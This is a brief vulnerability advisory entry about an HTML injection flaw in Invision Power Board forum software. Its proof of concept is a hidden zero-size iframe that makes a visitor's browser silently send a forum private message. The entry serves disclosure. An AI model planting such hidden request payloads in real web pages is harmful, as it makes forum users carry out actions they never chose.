Invision Power Board HTML Injection Vulnerability

info
discussion
exploit
solution
references

Invision Power Board HTML Injection Vulnerability

An exploit is not required to leverage this issue.

The following proof of concept is available:

<iframe id="frame1" name="frame1" frameborder=0 width=0 height=0
src="http://www.example.com/forums/index.php?act=Msg&CODE=04&MODE=1&entered_name=Woody&msg_title=hi&Post=I%20love%20you!">
</iframe>